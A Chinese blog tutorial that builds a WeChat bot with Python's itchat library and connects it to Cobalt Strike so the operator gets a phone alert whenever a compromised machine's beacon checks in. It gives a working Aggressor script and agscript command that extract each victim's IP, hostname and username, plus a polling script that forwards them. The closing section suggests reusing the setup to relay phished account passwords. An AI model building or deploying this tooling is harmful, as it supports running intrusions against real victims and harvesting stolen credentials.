目錄
- 前言
- 微信機器人
- 啟動微信
- 檔案傳輸助手
- 接收訊息并回復
- agscript
- cs上線微信提醒
- 實戰
- 總結
前言
之前看到師傅們cs上線提醒用的是釘釘機器人,但是釘釘不一定每個人手機上都有,微信應該是每個人手機上都有的,就想著整個微信的,這不就巧了,在刷動態時,發現了微信聊天機器人,改造一下這不就剛正合適,這就跟nice,于是乎就去學了手微信機器人,最后也是成功接受到微信給我發目標資訊,一個字爽,這篇文章主要是通過微信機器人來實作目標上線提醒
注:如果你只想看微信聊天機器人的話,看完文章微信機器人版本即可
微信機器人
這個微信機器人是基于Python的,用的還是itchat庫,但是不是之前的網頁版微信,而是桌面版
啟動微信
這行命令用于登錄卓面版微信,當程式運行這行命令時會彈出一個二維碼,用微信去掃即可登錄
import itchat
if __name__ == '__main__':
itchat.auto_login()
手機掃完應該是這樣的
確認登錄即可,由于程式就一行代碼,所以確認登錄就結束了,紅框中的引數是微信名
登錄函式常用的兩個引數
- enableCmdQR:將二維碼在命令列中顯示出來,如果掃描報錯,或者無法登錄,可以試著將該引數的值為2
- hotReload:持續一段時間登錄并在第一次登錄成功時在當前目錄生成一個itchat.pkl檔案,洗掉該檔案在次運行會要求重新掃二維碼
檔案傳輸助手
接下來用檔案傳輸助手給你微信發訊息
import itchat
if __name__ == '__main__':
# 將二維碼列印itchat.auto_login(enableCmdQR=2, hotReload=True)
itchat.auto_login(hotReload=True)
#第一個引數為發送文本
itchat.send_msg("Hello,XD", toUserName='filehelper')
運行該程式,一會你就可以收到檔案助手給你發訊息了
接收訊息并回復
有關@函式裝飾器可以看這篇文章(http://c.biancheng.net/view/2270.html)
@itchat.msg_register(itchat.content.TEXT)
def _reply(msg):
print(msg.text) # 用戶的資訊包含給你發的訊息
return_user = "Xd"
return return_user
這里得借助run函式回圈接受訊息,不然程式一跑結束了,訊息還沒來,程式先結束了
import itchat
@itchat.msg_register(itchat.content.TEXT)
def Send_Msg(msg):
print(msg.text) # 用戶的資訊包含給你發的訊息
return_user = "Xd"
return return_user
if __name__ == '__main__':
# Linux:itchat.auto_login(enableCmdQR=2, hotReload=True)
itchat.auto_login(hotReload=True)
itchat.run()
由于return_user值沒變化,所以不論發什么訊息都是回復Xd,可以自己做一個介面,把好友發來的訊息交給介面處理,最后把要回復的訊息回傳給return_user,可以利用百度或者圖靈的介面
agscript
cs目錄下有該檔案agscript,可以利用cna腳本獲取cs的目標上線資訊,在cs目錄下創建xd.cna檔案
println('listen suscess');
on beacon_initial {
println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
local('$internalIP $computerName $userName');
$internalIP = replace(beacon_info($1, "external"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$text = $internalIP . '&' . $computerName . '&' . $userName;
println($text)
}
./agscript CsServerIP CsPort user passwd xd.cna,user不能重復,否則會listen 失敗,可以看到agscript運行后當有一個目標上線時就會出現紅框的資訊,分別是目標IP、主機名、用戶名,可以使用重定向把列印資訊輸出到一個檔案里
cs上線微信提醒
通過前面的微信機器人和agscript,我們可以做到發微信訊息和獲取cs目標上線資訊,接下來可以使用重復讀取檔案內容,每次把檔案更新的內容發送到微信上面
#!/usr/bin/env python
# encoding: utf-8
'''
@Author : xd
@Date : 2021-12-25 21:28
@Description : cs上線微信提醒.
'''
import time
import itchat
def main():
itchat.auto_login(enableCmdQR=2, hotReload=True)
num = 0
while 1:
#path位置為agscript重定向檔案路徑
text = open('path‘).read().split('\n')
if num + 1 == len(text):
continue
time.sleep(3)
for i in range(num, len(text)):
if text[i] == None:
continue
else:
if '&' in text[i]:
str = text[i].split('&')
itchat.send(' IP : %s\nHostname : %s\nUsername : %s' % (str[0], str[1], str[2]),
toUserName='filehelper')
else:
itchat.send(text[i], toUserName='filehelper')
num = len(text) - 1
if __name__ == '__main__':
main()
實戰
我們先把cs啟動起來,生成一個pyload,再把agscript程式后臺運行起來,最后使用運行我們的Python微信機器人
現在我們上線第一臺靶機
微信自然也是緊跟其后的發送訊息
隔個幾分鐘,我們在上一臺靶機
微信肯定依舊跟上
總結
最終也是成功的實作了cs上線微信提醒,其實并不止cs上線可以,你也可以改動用于釣魚賬戶密碼之類,我只是解決了利用微信發訊息,但是怎么玩,還得取決于你
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/396093.html
標籤:其他